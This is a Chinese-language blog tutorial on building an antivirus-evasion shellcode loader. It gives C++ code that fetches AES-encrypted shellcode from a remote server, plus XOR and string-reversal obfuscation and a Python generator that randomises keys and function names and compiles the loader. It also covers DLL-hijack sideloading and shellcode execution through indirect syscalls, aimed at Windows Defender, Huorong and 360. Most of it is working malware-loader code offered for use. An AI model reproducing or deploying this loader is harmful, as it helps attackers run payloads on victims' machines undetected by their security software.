python动态生成C++免杀加载器,并且通过 间接系统调用 绕过Windows Defender,火绒,360的教程

记录一下我是怎么写的:

(我非网安专业,技术有不严谨的地方,下面的代码属于我从表面上知道杀软怎么查杀的,然后根据教程编写出来的

分离免杀策略

无论是直接用数组存shellcode还是存加密后的shellcode,在C++里面直接硬编码大片的shellcode数据不是一个好习惯,使得生成的exe特征明显,而且容易被静态杀掉

所谓分离,就是把loader和shellcode分离出来

一般有两种策略:

  1. 把shellcode放在本地的另一个文件

  2. 把shellcode托管在网络服务器上

我选择了第二种

在C++动态读取shellcode

编写一个通过winhttp下载shellcode的函数

#include <windows.h>
#include <winhttp.h>

BOOL WinhttpGET(const wchar_t* url, const wchar_t* file, void** buf, PDWORD bufsize, int port) {
    HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
    BOOL bResults = FALSE;
    DWORD dwSize = 0, dwDownloaded = 0;
    LPSTR pszOutBuffer = NULL;
    BOOL bSuccess = FALSE;

    // Initialize WinHTTP session
    hSession = WinHttpOpen("winhttp/1.0",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS, 0);

    if (hSession) {
        // Specify the target server
        hConnect = WinHttpConnect(hSession, url, port, 0);
    }

    if (hConnect) {
        // Create an HTTP request
        hRequest = WinHttpOpenRequest(hConnect, L"GET", file,
                                      NULL, WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {
        // Send the request
        bResults = WinHttpSendRequest(hRequest,
                                      WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                                      WINHTTP_NO_REQUEST_DATA, 0,
                                      0, 0);
    }

    if (bResults) {
        // Receive the response
        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults) {
        DWORD totalSize = 0;
        // Initialize a dynamic buffer
        *buf = NULL;
        *bufsize = 0;

        // Keep checking for data until there is nothing left
        do {
            // Check for available data
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
#ifdef DEBUG_MODE
                printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
#endif
                break;
            }

            if (dwSize == 0)
                break;

            // Allocate temporary buffer
            pszOutBuffer = (LPSTR)malloc(dwSize);
            if (!pszOutBuffer) {
#ifdef DEBUG_MODE
                printf("Out of memory\n");
                dwSize = 0;
#endif
                break;
            }

            // Read the data
            ZeroMemory(pszOutBuffer, dwSize);

            if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {
#ifdef DEBUG_MODE
                printf("Error %u in WinHttpReadData.\n", GetLastError());
#endif
                free(pszOutBuffer);
                break;
            } else {
                // Reallocate the output buffer to fit the new data
                *buf = realloc(*buf, totalSize + dwDownloaded);
                if (*buf == NULL) {
#ifdef DEBUG_MODE
                    printf("Out of memory\n");
#endif
                    free(pszOutBuffer);
                    break;
                }

                // Copy the new data into the output buffer
                //print_shellcode((void*)pszOutBuffer, dwDownloaded);

                memcpy((char*)*buf + totalSize, pszOutBuffer, dwDownloaded);
                totalSize += dwDownloaded;
                *bufsize = totalSize;
                bSuccess = TRUE;
            }

            // Free the temporary buffer
            free(pszOutBuffer);
        } while (dwSize > 0);
    }

    // Report errors
#ifdef DEBUG_MODE
    if (!bResults) {
        printf("Error %d has occurred.\n", GetLastError());
    }
#endif

    // Close open handles
    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return bSuccess;
}

加密处理

选择的方案是:异或加密+逆序字符串+AES加密

算法放在下面了,有些变量需要你自行修改一下

注意这个AES解密算法的实现方式是根据我的python脚本设计的

def aes_encrypt(data, key):
    iv = 16 * b'\x00'
    cipher = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
    encrypted_data = cipher.encrypt(pad(data, AES.block_size))
    return encrypted_data

char XORKeyData[] = {REPLACEME_KEY, 0x00}; // Reversed key

int AESDecrypt(char* difern, unsigned int difern_len, char* key, size_t keylen) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    HCRYPTKEY hKey;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return -1;
    }
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
        return -1;
    }
    if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
        return -1;
    }
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
        return -1;
    }
    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, difern, &difern_len)) {
        return -1;
    }
    CryptReleaseContext(hProv, 0);
    CryptDestroyHash(hHash);
    CryptDestroyKey(hKey);
    return 0;
}

void XorData(char *data, size_t dataLen, const char *key, size_t keyLen) {
    for (size_t i = 0; i < dataLen; i++) {
        data[i] ^= key[i % keyLen];
    }
}

std::string DecryptOnFly(const std::vector<unsigned char>& data) {
    // Make a copy of data to be mutable
    std::vector<char> mutableData(data.begin(), data.end());
    // Decrypt the data
    XorData(mutableData.data(), mutableData.size(), XORKeyData, sizeof(XORKeyData) - 1);
    // Decode the decrypted data
    return std::string(mutableData.begin(), mutableData.end());
}

void ReverseString(char *data, size_t dataLen) {
    int start = 0;
    int end = dataLen - 1;
    while (start < end) {
        char temp = data[start];
        data[start] = data[end];
        data[end] = temp;
        start++;
        end--;
    }
}

void GetXORKey(char *data, unsigned int *key_len ) {
    for (int i = 0; i < sizeof(XORKeyData)-1;i++) {
        data[i] = XORKeyData[i];
    }
    *key_len = sizeof(XORKeyData)-1;
}

至此,loader加载shellcode的流程是:

  1. 动态解密被异或后的url,文件名,以及端口

  2. 连接到文件托管服务器

  3. 通过winhttp接收被AES加密后的shellcode

  4. 在程序里解密shellcode

结合Python,动态生成loader

有了加密算法,我们还需要加密所需要的密钥

那么问题来了,如何存储密钥,而且让程序没那么容易被逆向分析?

动态代码生成

答案是动态生成密钥,然后硬编码在C++里面,可以保证每次生成的loader特征会稍微不一样

一个简单的方法是通过字符串替换

比如在C++里硬编码:REPLACEME_KEY, REPLACEME_URL, REPLACEME_PORT, REPLACEME_FILE

char XORKeyData[] = {REPLACEME_KEY, 0x00}; // Reversed key	
	char Encrypted_URL[] = {REPLACEME_URL, 0x00}; // Reversed URL
    char Encrypted_Port[] = {REPLACEME_PORT, 0x00}; // Reversed Port
    char Encrypted_File[] = {REPLACEME_FILE, 0x00};

    char XORKeyData[256];
    unsigned int key_len;
    GetXORKey(XORKeyData, &key_len);

    ReverseString(Encrypted_URL, sizeof(Encrypted_URL) - 1);
    XorData(Encrypted_URL, sizeof(Encrypted_URL) - 1, XORKeyData, key_len);

    ReverseString(Encrypted_Port, sizeof(Encrypted_Port) - 1);
    XorData(Encrypted_Port, sizeof(Encrypted_Port) - 1, XORKeyData, key_len);

    ReverseString(Encrypted_File, sizeof(Encrypted_File) - 1);
    XorData(Encrypted_File, sizeof(Encrypted_File) - 1, XORKeyData, key_len);

把项目的源代码都放到 src 文件夹里面,然后在src旁边建一个cache文件夹

把带有main函数的template.cpp放到src里面

然后在python里面,我们读取模版c++文件,然后对自定义的片段进行替换:

for f_str in os.listdir("src"):
        if f_str.endswith(".cpp") or f_str.endswith(".h"):
            with open(os.path.join("src", f_str), "r") as f:
                source = f.read()
                source = source.replace("REPLACEME_URL", to_c_array(url))
                source = source.replace("REPLACEME_PORT", to_c_array(port))
                source = source.replace("REPLACEME_FILE", to_c_array(file))
                source = source.replace("REPLACEME_KEY", to_c_array(random_key))

                for name, obf in obfuscated.items():
                    source = source.replace(name, to_c_array(obf))
                for name in random_names:
                    source = source.replace(name, modified_function[name])

                cache_path = os.path.join("cache", f_str)
                modified_source.append(cache_path)
                with open(cache_path, "w") as t:
                    t.write(source)

那么,经过替换后,我们的c++代码会变成:

char Encrypted_URL[] = {0x34, 0x45, 0x5b, 0x0, 0x00}; // Reversed URL
    char Encrypted_Port[] = {0x72, 0x52, 0x46, 0x46, 0x00}; // Reversed Port
    char Encrypted_File[] = {0x3, 0xa, 0x5b, 0x00};

    char uWvfsDAUgdsGxnBi[256];
    unsigned int key_len;
	//顺便随机化了函数名,具体实现贴在了下面完整的python代码
    elMQuAlwfOlpAcsb(uWvfsDAUgdsGxnBi, &key_len);

    tNuEkdfEHemjAeuq(Encrypted_URL, sizeof(Encrypted_URL) - 1);
    PyQIGtiyBPTajbjG(Encrypted_URL, sizeof(Encrypted_URL) - 1, uWvfsDAUgdsGxnBi, key_len);

    tNuEkdfEHemjAeuq(Encrypted_Port, sizeof(Encrypted_Port) - 1);
    PyQIGtiyBPTajbjG(Encrypted_Port, sizeof(Encrypted_Port) - 1, uWvfsDAUgdsGxnBi, key_len);

    tNuEkdfEHemjAeuq(Encrypted_File, sizeof(Encrypted_File) - 1);
    PyQIGtiyBPTajbjG(Encrypted_File, sizeof(Encrypted_File) - 1, uWvfsDAUgdsGxnBi, key_len);

编译

然后调用系统的mingw编译器

command = [
        "x86_64-w64-mingw32-g++"
    ] + [file for file in modified_source if file.endswith(".cpp")] + [
        "-fpermissive", "-Wno-narrowing", "-lwinhttp", "-lcrypt32", "-lwinpthread",
        "-O2", "-static", "-static-libgcc", "-static-libstdc++", "-DNDEBUG", "-w"
    ]

    command.append("-mwindows")
    command.extend(["-o", MALWARE])       
    print(command)

    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = process.communicate()
    if process.returncode != 0:
        print("Error: " + error.decode())
        print("!!!Compilation failed!!!")
    else:
        for file in modified_source:
            os.remove(file)
        print("***Loader compiled***")

完整代码

不废话直接贴完整代码:

附加了白加黑 DLL 免杀功能

import os
import subprocess
import sys
import random
import string
import os, string, shutil,re,sys
import pefile

MALWARE = "out.exe"
USE_DEBUG = False

random_names = [
    "XORKeyData", "XorData", "AESDecrypt", "DecryptOnFly", "ReverseString",
    "WinhttpGET"
]

function_names = {
    "REPLACEME_NTDLL_ABS": "c:\\windows\\system32\\ntdll.dll",
    "REPLACEME_NTDLL": "ntdll.dll",
    "RANDOM_0": "kernel32.dll",
    "REPLACEME_AES_KEY": "你的AES密钥",
    "REPLACEME_WINHTTP": "winhttp/1.0"
}

def xor(data, key):
    return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))


def to_c_array(data):
    return ', '.join(hex(ord(c)) for c in data)


if len(sys.argv) < 4:
    print("Usage: python3 gen.py <exe/dll> <url> <port> <file> (dll's exe) (dll)")
    exit(0)

def dll_gen(module_name,target_dll):
    extra_string = ''
    pe = pefile.PE(module_name)
    for importeddll in pe.DIRECTORY_ENTRY_IMPORT:
        DllName = str(importeddll.dll,encoding = "utf-8")
        if(DllName != target_dll):
            continue
        print("即将要劫持的目标为:%s,注意,请确保这个DLL不是系统DLL,如果这个DLL是系统DLL可能会无法劫持成功" % DllName)
        i = 1 
        for importedapi in importeddll.imports:
            print(importedapi.name)
            FunctionName = str(importedapi.name,encoding = "utf-8")
            print("导出函数名为:%s" % FunctionName)
            extra_string += """#pragma comment(linker, "/EXPORT:%s=%s,@%s")\n""" % (FunctionName,FunctionName,i)
            i+=1
            extra_string += """EXTERN_C __declspec(naked) void __cdecl %s(void){}\n""" % (FunctionName)
    return extra_string


def main():
    char_set = string.ascii_lowercase + string.digits + string.punctuation
    random_key = ''.join(random.choices(char_set, k=8))

    print(f"Key: {random_key}")

    obfuscated = {k: xor(v, random_key) for k, v in function_names.items()}

    generation = sys.argv[1]

    use_dll = False
    dll_exe = ''
    dll_file = ''
    if generation == 'dll':
        use_dll = True
        dll_exe = sys.argv[5]
        dll_file = sys.argv[6]
    elif generation == 'exe':
        use_dll = False
    else:
        print("wrong format.")
        exit()

    url = xor(sys.argv[2], random_key)[::-1]
    port = xor(sys.argv[3], random_key)[::-1]
    file = xor('/' + sys.argv[4], random_key)[::-1]

    modified_source = []
    modified_function = {name: ''.join(random.choices(string.ascii_letters, k=16)) for name in random_names}

    if not os.path.exists("src"):
        print("Error: 'src' directory does not exist.")
        exit(1)

    for f_str in os.listdir("src"):
        if f_str.endswith(".cpp") or f_str.endswith(".h"):
            with open(os.path.join("src", f_str), "r") as f:
                source = f.read()
                source = source.replace("REPLACEME_URL", to_c_array(url))
                source = source.replace("REPLACEME_PORT", to_c_array(port))
                source = source.replace("REPLACEME_FILE", to_c_array(file))
                source = source.replace("REPLACEME_KEY", to_c_array(random_key))

                for name, obf in obfuscated.items():
                    source = source.replace(name, to_c_array(obf))
                for name in random_names:
                    source = source.replace(name, modified_function[name])

                cache_path = os.path.join("cache", f_str)
                modified_source.append(cache_path)
                with open(cache_path, "w") as t:
                    t.write(source)


    with open("cache/template.cpp", "r") as f:
        source = f.read()
        
    if USE_DEBUG:
        source = source.replace("REPLACEME_DEBUG", "#define DEBUG_MODE")
    else:
        source = source.replace("REPLACEME_DEBUG", "")
    if use_dll:
        source = source.replace("REPLACEME_IF_USE_DLL", "#define USE_DLL_MODE")
        source = source.replace("REPLACEME_DLL_IMPORTS", dll_gen(dll_exe, dll_file))
    else:
        source = source.replace("REPLACEME_IF_USE_DLL", "")
        source = source.replace("REPLACEME_DLL_IMPORTS", "")

    with open("cache/template.cpp", "w") as f:
        f.write(source)

        
    print("Compiling loader...")
    command = [
        "x86_64-w64-mingw32-g++"
    ] + [file for file in modified_source if file.endswith(".cpp")] + [
        "-fpermissive", "-Wno-narrowing", "-lwinhttp", "-lcrypt32", "-lwinpthread",
        "-O2", "-static", "-static-libgcc", "-static-libstdc++", "-DNDEBUG", "-w"
    ]

    if not USE_DEBUG:
        command.append("-mwindows")

    if use_dll:
        command.extend(["-lShlwapi", "-lPsapi", "-shared", "-o", dll_file + ".hjacked"])       
    else:
        command.extend(["-o", MALWARE])       
    print(command)

    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = process.communicate()
    if process.returncode != 0:
        print("Error: " + error.decode())
        print("!!!Compilation failed!!!")
    else:
        for file in modified_source:
            os.remove(file)
        print("***Loader compiled***")


if __name__ == "__main__":
    main()

执行shellcode

现在到了我们执行shellcode的阶段

利用系统特性和直接系统调用(Direct System Call)执行,得以免杀主流杀软(火绒、360全部产品、毒霸等),该方式也是主流绕过3环AV、EDR、沙箱的常用手段

我们知道,系统核心态指的是R0,用户态指的是R3,系统代码在核心态下运行,用户代码在用户态下运行。系统中一共有四个权限级别,R1和R2运行设备驱动,R0到R3权限依次降低,R0和R3的权限分别为最高和最低。

Windows 内核基础

此节概念引用自《加密与解密》第7章

现代操作系统一般分为应用层和内核层两部分。应用层通过系统调用进入内核,由系统底层完成响应的功能,这时候内核执行处在该进程的上下文空间中。同时内核处理某些硬件发来的中断请求,代替硬件完成某些功能,这时候内核处在中断的上下文空间中。

#权限级别

系统内核层又叫零环(Ring 0),与此对应的应用层叫3环(即Ring 3)。

CPU 设计者将CPU 的运行级别从内向外分为4个,依次为R0,R1,R2,R3,运行权限从R0到R3依次降低。操作系统设计者在设计操作系统的时候,并没有使用R1和R2 两个级别(本来应该用来运行设备驱动),而是将设备驱动运行在与内核同级别的R0级。(在AMD64 CPU 之后,CPU 也只保留了R0和R3两个级别)

#R3 与 R0 通信

当应用程序调用一个API 时,实际上是调用应用层的某个DLL 库(如kernel32.dll 、user32.dll)。而此DLL 中还会调用在ntdll.dll 中的Native API 函数。例如当kernel32.dll 中的API 通过ntdll.dll 执行时,会完成参数的检查工作,再调用一个中断(int 2Eh或者SysEnter/syscall指令),里面存放了与ntdll.dll 中对应的SSDT 系统服务处理函数,即内核态的Nt*系列函数,它们与ntdll.dll 中的函数一一对应。

大部分API在R3都是处理各种校验,真正执行功能都是在R0(并不是所有的API都是在R0处理)。

ntdll.dll 中的Native API 函数时成对出现的,分别以Nt和Zw 开头,它们本质上是一样的只是名字不同。使用Zw* 系列的API 可以避免额外的参数列表检查,提高效率。

讲了这么多,意思就是我们通过直接系统调用,在R0环执行操作,从而绕过杀软和各种hook的检测

但是对于直接系统调用,系统调用本身及其返回执行发生在执行进程的.exe文件的内存空间中,这会导致调用堆栈的顶帧来自.exe内存,而不是ntdll.dll内存,这个特征可能会导致程序被杀掉,但是间接系统调用的表现就更合法。系统调用的执行和返回指令都发生在ntdll.dll的内存中,这是正常应用程序进程中的预期行为。

框架选择

有几种已知的直接系统调用框架可以选择

  1. HellGate (地狱之门,比较老了)

  2. HaloGate (光环之门)

  3. SysWhispers

  4. SysWhispers2

有几种已知的间接系统调用框架可以选择

  1. SysWhispers3

  2. HWSyscall

我选择了 HWSyscall

Dec0ne/HWSyscalls: HWSyscalls is a new method to execute indirect syscalls using HWBP, HalosGate and a synthetic trampoline on kernel32 with HWBP. (github.com)

HWSyscalls 是一种使用 3 个主要组件执行间接系统调用的新方法:

硬件断点和向量异常处理程序用于控制执行流程。

我通过HWSyscall的库,把Harriet 免杀框架的DirectSyscall部分代码进行了魔改:

LPVOID allocation_start = nullptr;
    SIZE_T allocation_size = Random3_len;
    HANDLE hThread;
    NTSTATUS status;
    DWORD oldprotect = 0;

    char tmp[256];
    strcpy(tmp, DecryptOnFly({RANDOM_1}).c_str());
    NtAllocateVirtualMemory_t pNtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)PrepareSyscall((char*)tmp);
    if (!pNtAllocateVirtualMemory) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, &allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }

    // Write the payload to the allocated memory
    strcpy(tmp, DecryptOnFly({RANDOM_2}).c_str());
    NtWriteVirtualMemory_t pNtWriteVirtualMemory = (NtWriteVirtualMemory_t)PrepareSyscall((char*)tmp);
    if (!pNtWriteVirtualMemory) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtWriteVirtualMemory(GetCurrentProcess(), allocation_start, Random3, Random3_len, 0);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }

    // Change memory protection to PAGE_EXECUTE_READ
    ULONG oldProtect;
    strcpy(tmp, DecryptOnFly({RANDOM_3}).c_str());
    NtProtectVirtualMemory_t pNtProtectVirtualMemory = (NtProtectVirtualMemory_t)PrepareSyscall((char*)tmp);
    if (!pNtProtectVirtualMemory) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtProtectVirtualMemory(GetCurrentProcess(), &allocation_start, &allocation_size, PAGE_EXECUTE_READ, &oldProtect);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }

    // Create a remote thread to execute the payload
    strcpy(tmp, DecryptOnFly({RANDOM_4}).c_str());
    NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t)PrepareSyscall((char*)tmp);
    if (!pNtCreateThreadEx) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }

    // Wait for the thread to finish execution
    strcpy(tmp, DecryptOnFly({RANDOM_5}).c_str());
    NtWaitForSingleObject_t pNtWaitForSingleObject = (NtWaitForSingleObject_t)PrepareSyscall((char*)tmp);
    if (!pNtWaitForSingleObject) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtWaitForSingleObject(hThread, FALSE, NULL);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }

    strcpy(tmp, DecryptOnFly({RANDOM_6}).c_str());
    NtClose_t pNtClose = (NtClose_t)PrepareSyscall((char*)tmp);
    if (!pNtClose) {
        CleanupSyscalls();
        return 0;
    }
    status = pNtClose(hThread);
    if (status != 0) {
        CleanupSyscalls();
        return 0;
    }